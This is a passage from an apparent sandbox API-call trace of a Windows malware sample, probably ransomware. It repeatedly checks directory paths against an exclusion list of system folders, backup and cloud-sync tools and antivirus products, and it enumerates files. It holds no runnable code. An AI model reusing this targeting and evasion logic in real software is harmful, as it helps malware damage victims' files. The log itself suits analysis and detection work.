10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.565] CharUpperBuffW (in: lpsz="FILES\\ACRONIS\\", cchLength=0xe | out: lpsz="FILES\\ACRONIS\\") returned 0xe [0058.565] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.565] CharUpperBuffW (in: lpsz="(X86)\\ACRONIS\\", cchLength=0xe | out: lpsz="(X86)\\ACRONIS\\") returned 0xe [0058.565] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.565] CharUpperBuffW (in: lpsz="FILES\\BACKUPCLIENT\\", cchLength=0x13 | out: lpsz="FILES\\BACKUPCLIENT\\") returned 0x13 [0058.565] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.565] CharUpperBuffW (in: lpsz="(X86)\\BACKUPCLIENT\\", cchLength=0x13 | out: lpsz="(X86)\\BACKUPCLIENT\\") returned 0x13 [0058.565] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.565] CharUpperBuffW (in: lpsz="FILES\\BACKUP MANAGER\\", cchLength=0x15 | out: lpsz="FILES\\BACKUP MANAGER\\") returned 0x15 [0058.565] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.565] CharUpperBuffW (in: lpsz="(X86)\\BACKUP MANAGER\\", cchLength=0x15 | out: lpsz="(X86)\\BACKUP MANAGER\\") returned 0x15 [0058.565] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.565] CharUpperBuffW (in: lpsz="FILES\\CARBONITE\\", cchLength=0x10 | out: lpsz="FILES\\CARBONITE\\") returned 0x10 [0058.565] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.565] CharUpperBuffW (in: lpsz="(X86)\\CARBONITE\\", cchLength=0x10 | out: lpsz="(X86)\\CARBONITE\\") returned 0x10 [0058.565] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.566] CharUpperBuffW (in: lpsz="FILES\\GOOGLE\\DRIVE\\", cchLength=0x13 | out: lpsz="FILES\\GOOGLE\\DRIVE\\") returned 0x13 [0058.566] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.566] CharUpperBuffW (in: lpsz="(X86)\\GOOGLE\\DRIVE\\", cchLength=0x13 | out: lpsz="(X86)\\GOOGLE\\DRIVE\\") returned 0x13 [0058.566] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.566] CharUpperBuffW (in: lpsz="FILES\\DROPBOX\\", cchLength=0xe | out: lpsz="FILES\\DROPBOX\\") returned 0xe [0058.566] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.566] CharUpperBuffW (in: lpsz="(X86)\\DROPBOX\\", cchLength=0xe | out: lpsz="(X86)\\DROPBOX\\") returned 0xe [0058.566] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.566] CharUpperBuffW (in: lpsz="FILES\\MICROSOFT ONEDRIVE\\", cchLength=0x19 | out: lpsz="FILES\\MICROSOFT ONEDRIVE\\") returned 0x19 [0058.566] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.566] CharUpperBuffW (in: lpsz="(X86)\\MICROSOFT ONEDRIVE\\", cchLength=0x19 | out: lpsz="(X86)\\MICROSOFT ONEDRIVE\\") returned 0x19 [0058.566] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.566] CharUpperBuffW (in: lpsz="FILES\\ONEDRIVE\\", cchLength=0xf | out: lpsz="FILES\\ONEDRIVE\\") returned 0xf [0058.566] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.566] CharUpperBuffW (in: lpsz="(X86)\\ONEDRIVE\\", cchLength=0xf | out: lpsz="(X86)\\ONEDRIVE\\") returned 0xf [0058.566] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.566] CharUpperBuffW (in: lpsz="VNC\\", cchLength=0x4 | out: lpsz="VNC\\") returned 0x4 [0058.566] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.566] CharUpperBuffW (in: lpsz="\\INTERNET EXPLORER\\", cchLength=0x13 | out: lpsz="\\INTERNET EXPLORER\\") returned 0x13 [0058.566] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.566] CharUpperBuffW (in: lpsz="\\MICROSOFT\\OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT\\OFFICE\\") returned 0x12 [0058.566] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.567] CharUpperBuffW (in: lpsz="\\MICROSOFT OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT OFFICE\\") returned 0x12 [0058.567] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.567] CharUpperBuffW (in: lpsz="\\WINDOWS SIDEBAR\\", cchLength=0x11 | out: lpsz="\\WINDOWS SIDEBAR\\") returned 0x11 [0058.567] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.567] CharUpperBuffW (in: lpsz="\\WINDOWS MEDIA PLAYER\\", cchLength=0x16 | out: lpsz="\\WINDOWS MEDIA PLAYER\\") returned 0x16 [0058.567] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.567] CharUpperBuffW (in: lpsz="\\DVD MAKER\\", cchLength=0xb | out: lpsz="\\DVD MAKER\\") returned 0xb [0058.567] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.567] CharUpperBuffW (in: lpsz="\\WINDOWSPOWERSHELL\\", cchLength=0x13 | out: lpsz="\\WINDOWSPOWERSHELL\\") returned 0x13 [0058.567] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.567] CharUpperBuffW (in: lpsz="\\WINDOWS DEFENDER\\", cchLength=0x12 | out: lpsz="\\WINDOWS DEFENDER\\") returned 0x12 [0058.567] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.567] CharUpperBuffW (in: lpsz="\\TOR BROWSER\\", cchLength=0xd | out: lpsz="\\TOR BROWSER\\") returned 0xd [0058.567] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.567] CharUpperBuffW (in: lpsz="\\ASPNET_CLIENT\\", cchLength=0xf | out: lpsz="\\ASPNET_CLIENT\\") returned 0xf [0058.567] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.567] CharUpperBuffW (in: lpsz="\\REFERENCE ASSEMBLIES\\", cchLength=0x16 | out: lpsz="\\REFERENCE ASSEMBLIES\\") returned 0x16 [0058.567] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.567] CharUpperBuffW (in: lpsz="\\MICROSOFT\\PROVISIONING\\", cchLength=0x18 | out: lpsz="\\MICROSOFT\\PROVISIONING\\") returned 0x18 [0058.567] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.567] CharUpperBuffW (in: lpsz="\\MICROSOFT SILVERLIGHT\\", cchLength=0x17 | out: lpsz="\\MICROSOFT SILVERLIGHT\\") returned 0x17 [0058.567] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.568] CharUpperBuffW (in: lpsz="\\PROGRAMDATA\\MICROSOFT\\", cchLength=0x17 | out: lpsz="\\PROGRAMDATA\\MICROSOFT\\") returned 0x17 [0058.568] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.568] CharUpperBuffW (in: lpsz="\\MICROSOFT\\CRYPTO\\", cchLength=0x12 | out: lpsz="\\MICROSOFT\\CRYPTO\\") returned 0x12 [0058.568] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.568] CharUpperBuffW (in: lpsz="\\WINDOWSAPPS\\", cchLength=0xd | out: lpsz="\\WINDOWSAPPS\\") returned 0xd [0058.568] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.568] CharUpperBuffW (in: lpsz="\\7-ZIP\\", cchLength=0x7 | out: lpsz="\\7-ZIP\\") returned 0x7 [0058.568] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.568] CharUpperBuffW (in: lpsz="\\WINRAR\\", cchLength=0x8 | out: lpsz="\\WINRAR\\") returned 0x8 [0058.568] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.568] CharUpperBuffW (in: lpsz="\\ESET", cchLength=0x5 | out: lpsz="\\ESET") returned 0x5 [0058.568] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.568] CharUpperBuffW (in: lpsz="\\AVAST", cchLength=0x6 | out: lpsz="\\AVAST") returned 0x6 [0058.568] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.568] CharUpperBuffW (in: lpsz="\\MALWAREBYTES", cchLength=0xd | out: lpsz="\\MALWAREBYTES") returned 0xd [0058.568] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.568] CharUpperBuffW (in: lpsz="\\SYMANTEC ENDPOINT", cchLength=0x12 | out: lpsz="\\SYMANTEC ENDPOINT") returned 0x12 [0058.568] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.568] CharUpperBuffW (in: lpsz="\\TREND MICRO", cchLength=0xc | out: lpsz="\\TREND MICRO") returned 0xc [0058.568] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.568] CharUpperBuffW (in: lpsz="\\BITDEFENDER", cchLength=0xc | out: lpsz="\\BITDEFENDER") returned 0xc [0058.568] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.568] CharUpperBuffW (in: lpsz="\\PANDA SECURITY", cchLength=0xf | out: lpsz="\\PANDA SECURITY") returned 0xf [0058.568] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.568] CharUpperBuffW (in: lpsz="\\MCAFEE", cchLength=0x7 | out: lpsz="\\MCAFEE") returned 0x7 [0058.568] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.569] CharUpperBuffW (in: lpsz="\\KASPERSKY LAB", cchLength=0xe | out: lpsz="\\KASPERSKY LAB") returned 0xe [0058.569] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.569] CharUpperBuffW (in: lpsz="\\KASPERSKYLAB", cchLength=0xd | out: lpsz="\\KASPERSKYLAB") returned 0xd [0058.569] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.569] CharUpperBuffW (in: lpsz="\\AVDEFENDER", cchLength=0xb | out: lpsz="\\AVDEFENDER") returned 0xb [0058.569] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.569] CharUpperBuffW (in: lpsz="\\SOPHOS", cchLength=0x7 | out: lpsz="\\SOPHOS") returned 0x7 [0058.569] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.569] CharUpperBuffW (in: lpsz="\\AVG", cchLength=0x4 | out: lpsz="\\AVG") returned 0x4 [0058.569] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RO_RO\\SERVICES\\") returned 0x46 [0058.569] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f4af00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81f971c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81f971c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa40 [0058.570] CharUpperBuffW (in: lpsz=".asfx", cchLength=0x5 | out: lpsz=".ASFX") returned 0x5 [0058.570] CharUpperBuffW (in: lpsz="DEXShare.asfx", cchLength=0xd | out: lpsz="DEXSHARE.ASFX") returned 0xd [0058.570] CharUpperBuffW (in: lpsz=".asfx", cchLength=0x5 | out: lpsz=".ASFX") returned 0x5 [0058.570] CharUpperBuffW (in: lpsz="Services.asfx", cchLength=0xd | out: lpsz="SERVICES.ASFX") returned 0xd [0058.570] FindClose (in: hFindFile=0x69aa40 | out: hFindFile=0x69aa40) returned 1 [0058.571] CharUpperBuffW (in: lpsz=".RUM", cchLength=0x4 | out: lpsz=".RUM") returned 0x4 [0058.571] CharUpperBuffW (in: lpsz="Spelling.RUM", cchLength=0xc | out: lpsz="SPELLING.RUM") returned 0xc [0058.571] CharUpperBuffW (in: lpsz=".RUM", cchLength=0x4 | out: lpsz=".RUM") returned 0x4 [0058.571] CharUpperBuffW (in: lpsz="Updater.RUM", cchLength=0xb | out: lpsz="UPDATER.RUM") returned 0xb [0058.571] CharUpperBuffW (in: lpsz=".RUM", cchLength=0x4 | out: lpsz=".RUM") returned 0x4 [0058.571] CharUpperBuffW (in: lpsz="Weblink.RUM", cchLength=0xb | out: lpsz="WEBLINK.RUM") returned 0xb [0058.571] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.571] CharUpperBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", cchLength=0x26 | out: lpsz="C:\\USERS\\5P5NRGJN0JS HALPMCXZ\\DESKTOP\\") returned 0x26 [0058.571] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.571] CharUpperBuffW (in: lpsz="\\PERFLOGS\\", cchLength=0xa | out: lpsz="\\PERFLOGS\\") returned 0xa [0058.571] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.571] CharUpperBuffW (in: lpsz="\\WINDOWS\\", cchLength=0x9 | out: lpsz="\\WINDOWS\\") returned 0x9 [0058.571] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.571] CharUpperBuffW (in: lpsz="\\WINDOWS.OLD\\", cchLength=0xd | out: lpsz="\\WINDOWS.OLD\\") returned 0xd [0058.571] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.571] CharUpperBuffW (in: lpsz="\\WINDOWS10UPGRADE\\", cchLength=0x12 | out: lpsz="\\WINDOWS10UPGRADE\\") returned 0x12 [0058.572] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.572] CharUpperBuffW (in: lpsz="\\$RECYCLE.BIN\\", cchLength=0xe | out: lpsz="\\$RECYCLE.BIN\\") returned 0xe [0058.572] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.572] CharUpperBuffW (in: lpsz="\\WINDOWS NT\\", cchLength=0xc | out: lpsz="\\WINDOWS NT\\") returned 0xc [0058.572] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.572] CharUpperBuffW (in: lpsz="\\COMMON FILES\\", cchLength=0xe | out: lpsz="\\COMMON FILES\\") returned 0xe [0058.572] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.572] CharUpperBuffW (in: lpsz="\\TEMP\\", cchLength=0x6 | out: lpsz="\\TEMP\\") returned 0x6 [0058.572] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.572] CharUpperBuffW (in: lpsz="\\BOOT\\", cchLength=0x6 | out: lpsz="\\BOOT\\") returned 0x6 [0058.572] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.572] CharUpperBuffW (in: lpsz="\\MSOCACHE\\", cchLength=0xa | out: lpsz="\\MSOCACHE\\") returned 0xa [0058.572] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.572] CharUpperBuffW (in: lpsz="\\DEFAULT USER\\", cchLength=0xe | out: lpsz="\\DEFAULT USER\\") returned 0xe [0058.572] CharUpperBuffW (in: 